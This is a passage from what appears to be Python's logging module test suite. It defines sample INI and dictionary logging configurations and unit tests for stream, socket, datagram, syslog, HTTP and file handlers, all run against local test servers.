[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1 adds a little to the standard configuration.
config1 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config1a moves the handler to the root.
config1a = """
[loggers]
keys=root,parser
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config2 has a subtle configuration error that should be reported
config2 = config1.replace("sys.stdout", "sys.stbout")
# config3 has a less subtle configuration error
config3 = config1.replace("formatter=form1", "formatter=misspelled_name")
# config4 specifies a custom formatter class to be loaded
config4 = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=NOTSET
handlers=hand1
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[formatter_form1]
class=""" + __name__ + """.ExceptionFormatter
format=%(levelname)s:%(name)s:%(message)s
datefmt=
"""
# config5 specifies a custom handler class to be loaded
config5 = config1.replace('class=StreamHandler', 'class=logging.StreamHandler')
# config6 uses ', ' delimiters in the handlers and formatters sections
config6 = """
[loggers]
keys=root,parser
[handlers]
keys=hand1, hand2
[formatters]
keys=form1, form2
[logger_root]
level=WARNING
handlers=
[logger_parser]
level=DEBUG
handlers=hand1
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stdout,)
[handler_hand2]
class=StreamHandler
level=NOTSET
formatter=form1
args=(sys.stderr,)
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
[formatter_form2]
format=%(message)s
datefmt=
"""
# config7 adds a compiler logger, and uses kwargs instead of args.
config7 = """
[loggers]
keys=root,parser,compiler
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
level=WARNING
handlers=hand1
[logger_compiler]
level=DEBUG
handlers=
propagate=1
qualname=compiler
[logger_parser]
level=DEBUG
handlers=
propagate=1
qualname=compiler.parser
[handler_hand1]
class=StreamHandler
level=NOTSET
formatter=form1
kwargs={'stream': sys.stdout,}
[formatter_form1]
format=%(levelname)s ++ %(message)s
datefmt=
"""
# config 8, check for resource warning
config8 = r"""
[loggers]
keys=root
[handlers]
keys=file
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=file
[handler_file]
class=FileHandler
level=DEBUG
args=("{tempfile}",)
"""
disable_test = """
[loggers]
keys=root
[handlers]
keys=screen
[formatters]
keys=
[logger_root]
level=DEBUG
handlers=screen
[handler_screen]
level=DEBUG
class=StreamHandler
args=(sys.stdout,)
formatter=
"""
def apply_config(self, conf, **kwargs):
file = io.StringIO(textwrap.dedent(conf))
logging.config.fileConfig(file, **kwargs)
def test_config0_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
self.apply_config(self.config0)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config0_using_cp_ok(self):
# A simple config file which overrides the default settings.
with support.captured_stdout() as output:
file = io.StringIO(textwrap.dedent(self.config0))
cp = configparser.ConfigParser()
cp.read_file(file)
logging.config.fileConfig(cp)
logger = logging.getLogger()
# Won't output anything
logger.info(self.next_message())
# Outputs a message
logger.error(self.next_message())
self.assert_log_lines([
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config1_ok(self, config=config1):
# A config file defining a sub-parser as well.
with support.captured_stdout() as output:
self.apply_config(config)
logger = logging.getLogger("compiler.parser")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config2_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config2)
def test_config3_failure(self):
# A simple config file which overrides the default settings.
self.assertRaises(Exception, self.apply_config, self.config3)
def test_config4_ok(self):
# A config file specifying a custom formatter class.
with support.captured_stdout() as output:
self.apply_config(self.config4)
logger = logging.getLogger()
try:
raise RuntimeError()
except RuntimeError:
logging.exception("just testing")
sys.stdout.seek(0)
self.assertEqual(output.getvalue(),
"ERROR:root:just testing\nGot a [RuntimeError]\n")
# Original logger output is empty
self.assert_log_lines([])
def test_config5_ok(self):
self.test_config1_ok(config=self.config5)
def test_config6_ok(self):
self.test_config1_ok(config=self.config6)
def test_config7_ok(self):
with support.captured_stdout() as output:
self.apply_config(self.config1a)
logger = logging.getLogger("compiler.parser")
# See issue #11424. compiler-hyphenated sorts
# between compiler and compiler.xyz and this
# was preventing compiler.xyz from being included
# in the child loggers of compiler because of an
# overzealous loop termination condition.
hyphenated = logging.getLogger('compiler-hyphenated')
# All will output a message
logger.info(self.next_message())
logger.error(self.next_message())
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '1'),
('ERROR', '2'),
('CRITICAL', '3'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
with support.captured_stdout() as output:
self.apply_config(self.config7)
logger = logging.getLogger("compiler.parser")
self.assertFalse(logger.disabled)
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
logger = logging.getLogger("compiler.lexer")
# Both will output a message
logger.info(self.next_message())
logger.error(self.next_message())
# Will not appear
hyphenated.critical(self.next_message())
self.assert_log_lines([
('INFO', '4'),
('ERROR', '5'),
('INFO', '6'),
('ERROR', '7'),
], stream=output)
# Original logger output is empty.
self.assert_log_lines([])
def test_config8_ok(self):
def cleanup(h1, fn):
h1.close()
os.remove(fn)
with self.check_no_resource_warning():
fd, fn = tempfile.mkstemp(".log", "test_logging-X-")
os.close(fd)
# Replace single backslash with double backslash in windows
# to avoid unicode error during string formatting
if os.name == "nt":
fn = fn.replace("\\", "\\\\")
config8 = self.config8.format(tempfile=fn)
self.apply_config(config8)
self.apply_config(config8)
handler = logging.root.handlers[0]
self.addCleanup(cleanup, handler, fn)
def test_logger_disabling(self):
self.apply_config(self.disable_test)
logger = logging.getLogger('some_pristine_logger')
self.assertFalse(logger.disabled)
self.apply_config(self.disable_test)
self.assertTrue(logger.disabled)
self.apply_config(self.disable_test, disable_existing_loggers=False)
self.assertFalse(logger.disabled)
def test_config_set_handler_names(self):
test_config = """
[loggers]
keys=root
[handlers]
keys=hand1
[formatters]
keys=form1
[logger_root]
handlers=hand1
[handler_hand1]
class=StreamHandler
formatter=form1
[formatter_form1]
format=%(levelname)s ++ %(message)s
"""
self.apply_config(test_config)
self.assertEqual(logging.getLogger().handlers[0].name, 'hand1')
def test_defaults_do_no_interpolation(self):
"""bpo-33802 defaults should not get interpolated"""
ini = textwrap.dedent("""
[formatters]
keys=default
[formatter_default]
[handlers]
keys=console
[handler_console]
class=logging.StreamHandler
args=tuple()
[loggers]
keys=root
[logger_root]
formatter=default
handlers=console
""").strip()
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.ini')
try:
os.write(fd, ini.encode('ascii'))
os.close(fd)
logging.config.fileConfig(
fn,
defaults=dict(
version=1,
disable_existing_loggers=False,
formatters={
"generic": {
"format": "%(asctime)s [%(process)d] [%(levelname)s] %(message)s",
"datefmt": "[%Y-%m-%d %H:%M:%S %z]",
"class": "logging.Formatter"
},
},
)
)
finally:
os.unlink(fn)
class SocketHandlerTest(BaseTest):
"""Test for SocketHandler objects."""
server_class = TestTCPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a TCP server to receive log messages, and a SocketHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_socket, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SocketHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Semaphore(0)
def tearDown(self):
"""Shutdown the TCP server."""
try:
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
if self.server:
self.server.stop()
finally:
BaseTest.tearDown(self)
def handle_socket(self, request):
conn = request.connection
while True:
chunk = conn.recv(4)
if len(chunk) < 4:
break
slen = struct.unpack(">L", chunk)[0]
chunk = conn.recv(slen)
while len(chunk) < slen:
chunk = chunk + conn.recv(slen - len(chunk))
obj = pickle.loads(chunk)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.release()
def test_output(self):
# The log message sent to the SocketHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("tcp")
logger.error("spam")
self.handled.acquire()
logger.debug("eggs")
self.handled.acquire()
self.assertEqual(self.log_output, "spam\neggs\n")
def test_noserver(self):
if self.server_exception:
self.skipTest(self.server_exception)
# Avoid timing-related failures due to SocketHandler's own hard-wired
# one-second timeout on socket.create_connection() (issue #16264).
self.sock_hdlr.retryStart = 2.5
# Kill the server
self.server.stop()
# The logging call should try to connect, which should fail
try:
raise RuntimeError('Deliberate mistake')
except RuntimeError:
self.root_logger.exception('Never sent')
self.root_logger.error('Never sent, either')
now = time.time()
self.assertGreater(self.sock_hdlr.retryTime, now)
time.sleep(self.sock_hdlr.retryTime - now + 0.001)
self.root_logger.error('Nor this')
def _get_temp_domain_socket():
fd, fn = tempfile.mkstemp(prefix='test_logging_', suffix='.sock')
os.close(fd)
# just need a name - file can't be present, or we'll get an
# 'address already in use' error.
os.remove(fn)
return fn
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSocketHandlerTest(SocketHandlerTest):
"""Test for SocketHandler with unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixStreamServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SocketHandlerTest.setUp(self)
def tearDown(self):
SocketHandlerTest.tearDown(self)
support.unlink(self.address)
class DatagramHandlerTest(BaseTest):
"""Test for DatagramHandler."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a DatagramHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sock_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.DatagramHandler
if isinstance(server.server_address, tuple):
self.sock_hdlr = hcls('localhost', server.port)
else:
self.sock_hdlr = hcls(server.server_address, None)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sock_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the UDP server."""
try:
if self.server:
self.server.stop()
if self.sock_hdlr:
self.root_logger.removeHandler(self.sock_hdlr)
self.sock_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
slen = struct.pack('>L', 0) # length of prefix
packet = request.packet[len(slen):]
obj = pickle.loads(packet)
record = logging.makeLogRecord(obj)
self.log_output += record.msg + '\n'
self.handled.set()
def test_output(self):
# The log message sent to the DatagramHandler is properly received.
if self.server_exception:
self.skipTest(self.server_exception)
logger = logging.getLogger("udp")
logger.error("spam")
self.handled.wait()
self.handled.clear()
logger.error("eggs")
self.handled.wait()
self.assertEqual(self.log_output, "spam\neggs\n")
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixDatagramHandlerTest(DatagramHandlerTest):
"""Test for DatagramHandler using Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
DatagramHandlerTest.setUp(self)
def tearDown(self):
DatagramHandlerTest.tearDown(self)
support.unlink(self.address)
class SysLogHandlerTest(BaseTest):
"""Test for SysLogHandler using UDP."""
server_class = TestUDPServer
address = ('localhost', 0)
def setUp(self):
"""Set up a UDP server to receive log messages, and a SysLogHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
# Issue #29177: deal with errors that happen during setup
self.server = self.sl_hdlr = self.server_exception = None
try:
self.server = server = self.server_class(self.address,
self.handle_datagram, 0.01)
server.start()
# Uncomment next line to test error recovery in setUp()
# raise OSError('dummy error raised')
except OSError as e:
self.server_exception = e
return
server.ready.wait()
hcls = logging.handlers.SysLogHandler
if isinstance(server.server_address, tuple):
self.sl_hdlr = hcls((server.server_address[0], server.port))
else:
self.sl_hdlr = hcls(server.server_address)
self.log_output = ''
self.root_logger.removeHandler(self.root_logger.handlers[0])
self.root_logger.addHandler(self.sl_hdlr)
self.handled = threading.Event()
def tearDown(self):
"""Shutdown the server."""
try:
if self.server:
self.server.stop()
if self.sl_hdlr:
self.root_logger.removeHandler(self.sl_hdlr)
self.sl_hdlr.close()
finally:
BaseTest.tearDown(self)
def handle_datagram(self, request):
self.log_output = request.packet
self.handled.set()
def test_output(self):
if self.server_exception:
self.skipTest(self.server_exception)
# The log message sent to the SysLogHandler is properly received.
logger = logging.getLogger("slh")
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m\x00')
self.handled.clear()
self.sl_hdlr.append_nul = False
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>sp\xc3\xa4m')
self.handled.clear()
self.sl_hdlr.ident = "h\xe4m-"
logger.error("sp\xe4m")
self.handled.wait()
self.assertEqual(self.log_output, b'<11>h\xc3\xa4m-sp\xc3\xa4m')
@unittest.skipUnless(hasattr(socket, "AF_UNIX"), "Unix sockets required")
class UnixSysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with Unix sockets."""
if hasattr(socket, "AF_UNIX"):
server_class = TestUnixDatagramServer
def setUp(self):
# override the definition in the base class
self.address = _get_temp_domain_socket()
SysLogHandlerTest.setUp(self)
def tearDown(self):
SysLogHandlerTest.tearDown(self)
support.unlink(self.address)
@unittest.skipUnless(socket_helper.IPV6_ENABLED,
'IPv6 support required for this test.')
class IPv6SysLogHandlerTest(SysLogHandlerTest):
"""Test for SysLogHandler with IPv6 host."""
server_class = TestUDPServer
address = ('::1', 0)
def setUp(self):
self.server_class.address_family = socket.AF_INET6
super(IPv6SysLogHandlerTest, self).setUp()
def tearDown(self):
self.server_class.address_family = socket.AF_INET
super(IPv6SysLogHandlerTest, self).tearDown()
class HTTPHandlerTest(BaseTest):
"""Test for HTTPHandler."""
def setUp(self):
"""Set up an HTTP server to receive log messages, and a HTTPHandler
pointing to that server's address and port."""
BaseTest.setUp(self)
self.handled = threading.Event()
def handle_request(self, request):
self.command = request.command
self.log_data = urlparse(request.path)
if self.command == 'POST':
try:
rlen = int(request.headers['Content-Length'])
self.post_data = request.rfile.read(rlen)
except:
self.post_data = None
request.send_response(200)
request.end_headers()
self.handled.set()
def test_output(self):
# The log message sent to the HTTPHandler is properly received.
logger = logging.getLogger("http")
root_logger = self.root_logger
root_logger.removeHandler(self.root_logger.handlers[0])
for secure in (False, True):
addr = ('localhost', 0)
if secure:
try:
import ssl
except ImportError:
sslctx = None
else:
here = os.path.dirname(__file__)
localhost_cert = os.path.join(here, "keycert.pem")
sslctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
sslctx.load_cert_chain(localhost_cert)
context = ssl.create_default_context(cafile=localhost_cert)
else:
sslctx = None
context = None
self.server = server = TestHTTPServer(addr, self.handle_request,
0.01, sslctx=sslctx)
server.start()
server.ready.wait()
host = 'localhost:%d' % server.server_port
secure_client = secure and sslctx
self.h_hdlr = logging.handlers.HTTPHandler(host, '/frob',
secure=secure_client,
context=context,
credentials=('foo', 'bar'))
self.log_data = None
root_logger.addHandler(self.h_hdlr)
for method in ('GET', 'POST'):
self.h_hdlr.method = method
self.handled.clear()
msg = "sp\xe4m"
logger.error(msg)
self.handled.wait()
self.assertEqual(self.log_data.path, '/frob')
self.assertEqual(self.command, method)
if method == 'GET':
d = parse_qs(self.log_data.query)
else:
d = parse_qs(self.post_data.decode('utf-8'))
self.assertEqual(d['name'], ['http'])
self.assertEqual(d['funcName'], ['test_output'])
self.assertEqual(d['msg'], [msg])
self.server.stop()
self.root_logger.removeHandler(self.h_hdlr)
self.h_hdlr.close()
class MemoryTest(BaseTest):
"""Test memory persistence of logger objects."""
def setUp(self):
"""Create a dict to remember potentially destroyed objects."""
BaseTest.setUp(self)
self._survivors = {}
def _watch_for_survival(self, *args):
"""Watch the given objects for survival, by creating weakrefs to
them."""
for obj in args:
key = id(obj), repr(obj)
self._survivors[key] = weakref.ref(obj)
def _assertTruesurvival(self):
"""Assert that all objects watched for survival have survived."""
# Trigger cycle breaking.
gc.collect()
dead = []
for (id_, repr_), ref in self._survivors.items():
if ref() is None:
dead.append(repr_)
if dead:
self.fail("%d objects should have survived "
"but have been destroyed: %s" % (len(dead), ", ".join(dead)))
def test_persistent_loggers(self):
# Logger objects are persistent and retain their configuration, even
# if visible references are destroyed.
self.root_logger.setLevel(logging.INFO)
foo = logging.getLogger("foo")
self._watch_for_survival(foo)
foo.setLevel(logging.DEBUG)
self.root_logger.debug(self.next_message())
foo.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
])
del foo
# foo has survived.
self._assertTruesurvival()
# foo has retained its settings.
bar = logging.getLogger("foo")
bar.debug(self.next_message())
self.assert_log_lines([
('foo', 'DEBUG', '2'),
('foo', 'DEBUG', '3'),
])
class EncodingTest(BaseTest):
def test_encoding_plain_file(self):
# In Python 2.x, a plain file object is treated as having no encoding.
log = logging.getLogger("test")
fd, fn = tempfile.mkstemp(".log", "test_logging-1-")
os.close(fd)
# the non-ascii data we write to the log.
data = "foo\x80"
try:
handler = logging.FileHandler(fn, encoding="utf-8")
log.addHandler(handler)
try:
# write non-ascii data to the log.
log.warning(data)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
f = open(fn, encoding="utf-8")
try:
self.assertEqual(f.read().rstrip(), data)
finally:
f.close()
finally:
if os.path.isfile(fn):
os.remove(fn)
def test_encoding_cyrillic_unicode(self):
log = logging.getLogger("test")
# Get a message in Unicode: Do svidanya in Cyrillic (meaning goodbye)
message = '\u0434\u043e \u0441\u0432\u0438\u0434\u0430\u043d\u0438\u044f'
# Ensure it's written in a Cyrillic encoding
writer_class = codecs.getwriter('cp1251')
writer_class.encoding = 'cp1251'
stream = io.BytesIO()
writer = writer_class(stream, 'strict')
handler = logging.StreamHandler(writer)
log.addHandler(handler)
try:
log.warning(message)
finally:
log.removeHandler(handler)
handler.close()
# check we wrote exactly those bytes, ignoring trailing \n etc
s = stream.getvalue()
# Compare against what the data should be when encoded in CP-1251
self.assertEqual(s, b'\xe4\xee \xf1\xe2\xe8\xe4\xe0\xed\xe8\xff\n')
class WarningsTest(BaseTest):
def test_warnings(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
warnings.filterwarnings("always", category=UserWarning)
stream = io.StringIO()
h = logging.StreamHandler(stream)
logger = logging.getLogger("py.warnings")
logger.addHandler(h)
warnings.warn("I'm warning you...")
logger.removeHandler(h)
s = stream.getvalue()
h.close()
self.assertGreater(s.find("UserWarning: I'm warning you...\n"), 0)
# See if an explicit file uses the original implementation
a_file = io.StringIO()
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42,
a_file, "Dummy line")
s = a_file.getvalue()
a_file.close()
self.assertEqual(s,
"dummy.py:42: UserWarning: Explicit\n Dummy line\n")
def test_warnings_no_handlers(self):
with warnings.catch_warnings():
logging.captureWarnings(True)
self.addCleanup(logging.captureWarnings, False)
            # confirm our assumption: the py.warnings logger has no handlers
logger = logging.getLogger("py.warnings")
self.assertEqual(logger.handlers, [])
warnings.showwarning("Explicit", UserWarning, "dummy.py", 42)
self.assertEqual(len(logger.handlers), 1)
self.assertIsInstance(logger.handlers[0], logging.NullHandler)
def formatFunc(format, datefmt=None):
return logging.Formatter(format, datefmt)
class myCustomFormatter:
def __init__(self, fmt, datefmt=None):
pass
def handlerFunc():
return logging.StreamHandler()
class CustomHandler(logging.StreamHandler):
pass
class ConfigDictTest(BaseTest):
"""Reading logging config from a dictionary."""
check_no_resource_warning = support.check_no_resource_warning
expected_log_pat = r"^(\w+) \+\+ (\w+)$"
# config0 is a standard configuration.
config0 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config1 adds a little to the standard configuration.
config1 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config1a moves the handler to the root. Used with config8a
config1a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# config2 has a subtle configuration error that should be reported
config2 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdbout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a handler
config2a = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NTOSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# As config1 but with a misspelt level on a logger
config2b = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WRANING',
},
}
# config3 has a less subtle configuration error
config3 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'misspelled_name',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config4 specifies a custom formatter class to be loaded
config4 = {
'version': 1,
'formatters': {
'form1' : {
'()' : __name__ + '.ExceptionFormatter',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# As config4 but using an actual callable rather than a string
config4a = {
'version': 1,
'formatters': {
'form1' : {
'()' : ExceptionFormatter,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form2' : {
'()' : __name__ + '.formatFunc',
'format' : '%(levelname)s:%(name)s:%(message)s',
},
'form3' : {
'()' : formatFunc,
'format' : '%(levelname)s:%(name)s:%(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
'hand2' : {
'()' : handlerFunc,
},
},
'root' : {
'level' : 'NOTSET',
'handlers' : ['hand1'],
},
}
# config5 specifies a custom handler class to be loaded
config5 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config6 specifies a custom handler class to be loaded
# but has bad arguments
config6 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : __name__ + '.CustomHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'9' : 'invalid parameter name',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
    # config7 does not define compiler.parser but defines compiler.lexer
# so compiler.parser should be disabled after applying it
config7 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.lexer' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8 defines both compiler and compiler.lexer
# so compiler.parser should not be disabled (since
# compiler is defined)
config8 = {
'version': 1,
'disable_existing_loggers' : False,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
# config8a disables existing loggers
config8a = {
'version': 1,
'disable_existing_loggers' : True,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler' : {
'level' : 'DEBUG',
'handlers' : ['hand1'],
},
'compiler.lexer' : {
},
},
'root' : {
'level' : 'WARNING',
},
}
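    # config9 routes compiler.parser through hand1 with both levels at WARNING;
    # config9a and config9b are incremental updates that progressively lower
    # those levels (used by test_config_9_ok).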
config9 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'WARNING',
'stream' : 'ext://sys.stdout',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
},
'root' : {
'level' : 'NOTSET',
},
}
config9a = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'WARNING',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
config9b = {
'version': 1,
'incremental' : True,
'handlers' : {
'hand1' : {
'level' : 'INFO',
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'INFO',
},
},
}
# As config1 but with a filter added
config10 = {
'version': 1,
'formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'filters' : {
'filt1' : {
'name' : 'compiler.parser',
},
},
'handlers' : {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
'filters' : ['filt1'],
},
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
'filters' : ['filt1'],
},
},
'root' : {
'level' : 'WARNING',
'handlers' : ['hand1'],
},
}
# As config1 but using cfg:// references
config11 = {
'version': 1,
'true_formatters': {
'form1' : {
'format' : '%(levelname)s ++ %(message)s',
},
},
'handler_configs': {
'hand1' : {
'class' : 'logging.StreamHandler',
'formatter' : 'form1',
'level' : 'NOTSET',
'stream' : 'ext://sys.stdout',
},
},
'formatters' : 'cfg://true_formatters',
'handlers' : {
'hand1' : 'cfg://handler_configs[hand1]',
},
'loggers' : {
'compiler.parser' : {
'level' : 'DEBUG',
